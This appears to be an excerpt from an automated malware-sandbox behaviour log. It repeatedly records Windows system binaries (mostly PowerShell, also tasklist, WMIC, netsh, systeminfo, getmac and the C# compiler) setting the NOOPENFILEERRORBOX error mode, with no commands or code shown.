Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
